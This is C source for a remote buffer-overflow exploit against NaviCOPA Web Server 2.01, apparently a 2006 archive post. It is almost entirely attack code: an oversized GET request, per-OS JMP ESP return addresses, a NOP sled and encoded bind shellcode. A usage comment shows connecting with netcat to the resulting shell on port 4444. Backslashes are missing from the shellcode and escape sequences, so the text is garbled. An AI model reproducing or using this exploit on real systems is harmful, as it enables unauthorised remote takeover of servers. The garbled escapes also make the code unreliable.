/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:

C:>navi_exp 192.168.0.1 0

[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07 <h07@interia.pl>
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit


C:>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:windowssystem32>
*/

#include <winsock2.h>
#define PORT 80
#define BUFF_SIZE 1024

typedef struct
 {
 char os_name[32];
 unsigned long ret;
 } target;


char shellcode[] =

/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.com
*/

"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x91xbax06"
"x13x83xebxfcxe2xf4x6dxd0xedx5ex79x43xf9xecx6exda"
"x8dx7fxb5x9ex8dx56xadx31x7ax16xe9xbbxe9x98xdexa2"
"x8dx4cxb1xbbxedx5ax1ax8ex8dx12x7fx8bxc6x8ax3dx3e"
"xc6x67x96x7bxccx1ex90x78xedxe7xaaxeex22x3bxe4x5f"
"x8dx4cxb5xbbxedx75x1axb6x4dx98xcexa6x07xf8x92x96"
"x8dx9axfdx9ex1ax72x52x8bxddx77x1axf9x36x98xd1xb6"
"x8dx63x8dx17x8dx53x99xe4x6ex9dxdfxb4xeax43x6ex6c"
"x60x40xf7xd2x35x21xf9xcdx75x21xcexeexf9xc3xf9x71"
"xebxefxaaxeaxf9xc5xcex33xe3x75x10x57x0ex11xc4xd0"
"x04xecx41xd2xdfx1ax64x17x51xecx47xe9x55x40xc2xe9"
"x45x40xd2xe9xf9xc3xf7xd2x17x4fxf7xe9x8fxf2x04xd2"
"xa2x09xe1x7dx51xecx47xd0x16x42xc4x45xd6x7bx35x17"
"x28xfaxc6x45xd0x40xc4x45xd6x7bx74xf3x80x5axc6x45"
"xd0x43xc5xeex53xecx41x29x6exf4xe8x7cx7fx44x6ex6c"
"x53xecx41xdcx6cx77xf7xd2x65x7ex18x5fx6cx43xc8x93"
"xcax9ax76xd0x42x9ax73x8bxc6xe0x3bx44x44x3ex6fxf8"
"x2ax80x1cxc0x3exb8x3ax11x6ex61x6fx09x10xecxe4xfe"
"xf9xc5xcaxedx54x42xc0xebx6cx12xc0xebx53x42x6ex6a"
"x6exbex48xbfxc8x40x6ex6cx6cxecx6ex8dxf9xc3x1axed"
"xfax90x55xdexf9xc5xc3x45xd6x7bx61x30x02x4cxc2x45"
"xd0xecx41xbax06x13";

char buffer[BUFF_SIZE];

target list[] =
 {
 "XP SP2 Polish",
 0x7d168877, //JMP ESP

 "XP SP2 English",
 0x7ca58265, //JMP ESP

 "XP SP2 German",
 0x7cb4d5ac, //JMP ESP

 "2000 SP4 Polish",
 0x77596433, //JMP ESP

 "2000 SP4 English",
 0x78326433  //JMP ESP
 };

int main(int argc, char *argv[])
{
WSADATA wsa;
int sock, os, r_len, i,
a = (sizeof(list) / sizeof(target)) - 1;
unsigned long eip;
struct hostent *he;
struct sockaddr_in client;

printf("n[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploitn");
printf("[*] Coded by h07 <h07@interia.pl>n");

if(argc < 3)
 {
 printf("[*] Usage: %s <host> <system>n", argv[0]);
 printf("[*] Sample: %s 192.168.0.1 0n", argv[0]);
 printf("[*] Systems..n");
 for(i = 0; i <= a; i++)
 printf("[>] %d: %sn", i, list[i].os_name);
 return 1;
 }

WSAStartup(MAKEWORD(2, 0), &wsa);

os = atoi(argv[2]);

if((os < 0) || (os > a))
 {
 printf("[-] Error: unknown target %dn", os);
 return -1;
 }

eip = list[os].ret;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if((he = gethostbyname(argv[1])) == NULL)
 {
 printf("[-] Unable to resolven");
 return -1;
 }

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
 {
 printf("[-] Error: connect()n");
 return -1;
 }

r_len = 234;
memset(buffer, 0x41, r_len);
memcpy(buffer, "GET ", 4);
*((unsigned long*)(&buffer[r_len])) = eip;
memset(buffer + (r_len + 4), 0x90, 32);
strcat(buffer, shellcode);
strcat(buffer, " HTTP/1.1rnrnx00");

//buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1rnrnx00"]

if(send(sock, buffer, strlen(buffer), 0) != -1)
 {
 printf("[+] Sending buffer: OKn");
 printf("[*] Check your shell on %s:4444n", argv[1]);
 }
 else
 printf("[-] Sending buffer: failedn");

printf("[*] Press enter to quitn");
getchar();

return 0;
}

// www.Syue.com [2006-09-27]